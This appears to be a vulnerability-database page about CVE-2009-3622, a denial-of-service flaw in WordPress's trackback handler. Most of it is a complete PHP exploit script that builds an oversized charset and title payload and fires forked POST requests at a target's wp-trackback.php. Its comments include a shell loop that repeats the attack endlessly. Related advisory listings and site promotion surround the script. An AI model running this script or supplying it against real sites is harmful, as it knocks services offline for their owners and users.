Lucene search
K

WordPress Trackback脚本拒绝服务漏洞

🗓️ 27 Oct 2009 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 33 Views

WordPress Trackback denial of service vulnerability, exploiting server resource exhaustion through a crafted HTTP POST reques

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2009-3622
23 Oct 200918:00
cve
Cvelist
CVE-2009-3622
23 Oct 200918:00
cvelist
Debian CVE
CVE-2009-3622
23 Oct 200918:00
debiancve
EUVD
EUVD-2009-3603
7 Oct 202500:30
euvd
NVD
CVE-2009-3622
23 Oct 200918:30
nvd
OpenVAS
WordPress wp-trackback.php Denial of Service Vulnerability
29 Oct 200900:00
openvas
OSV
DEBIAN-CVE-2009-3622
23 Oct 200918:30
osv
Patchstack
WordPress <= 2.8.4 - Algorithmic complexity
9 Oct 200900:00
patchstack
Prion
Design/Logic Flaw
23 Oct 200918:30
prion
UbuntuCve
CVE-2009-3622
23 Oct 200918:30
ubuntucve
Rows per page

                                                &lt;?php
/*
* wordpress Resource exhaustion Exploit
* http://rooibo.wordpress.com/
* [email protected] contacted and get a response,
* but no solution available.
*
* [18/10/2009 20:31:00] modified by Zerial http://blog.zerial.org &lt;[email protected]&gt;
*
* exploiting:
* you must install php-cli (command line interface)
* $ while /bin/true; do php wp-trackbacks_dos.php http://target.com/wordpress; done
*
*/
if(count($argv) &lt; 2)
    die(&quot;You need to specify a url to attack\n&quot;);
$url = $argv[1];
$data = parse_url($url);
if(count($data) &lt; 2)
    die(&quot;The url should have http:// in front of it, and should be complete.\n&quot;);
$path = (count($data)==2)?&quot;&quot;:$data['path'];
$path = trim($path,'/').'/wp-trackback.php';
if($path{0} != '/')
    $path = '/'.$path;
$b = &quot;&quot;; $b = str_pad($b,140000,'ABCEDFG').utf8_encode($b);
$charset = &quot;&quot;;
$charset = str_pad($charset,140000,&quot;UTF-8,&quot;);
$str = 'charset='.urlencode($charset);
$str .= '&amp;url=www.example.com';
$str .= '&amp;title='.$b;
$str .= '&amp;blog_name=lol';
$str .= '&amp;excerpt=lol';
for($n = 0; $n &lt;= 5; $n++){
    $fp = @fsockopen($data['host'],80);
        if(!$fp)
        die(&quot;unable to connect to: &quot;.$data['host'].&quot;\n&quot;);
    $pid[$n] = pcntl_fork();
    if(!$pid[$n]){
        fputs($fp, &quot;POST $path HTTP/1.1\r\n&quot;);
        fputs($fp, &quot;Host: &quot;.$data['host'].&quot;\r\n&quot;);
        fputs($fp, &quot;Content-type: application/x-www-form-urlencoded\r\n&quot;);
        fputs($fp, &quot;Content-length: &quot;.strlen($str).&quot;\r\n&quot;);
        fputs($fp, &quot;Connection: close\r\n\r\n&quot;);
        fputs($fp, $str.&quot;\r\n\r\n&quot;);
        echo &quot;hit!\n&quot;;
    }
}
?&gt;
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Oct 2009 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.08278
33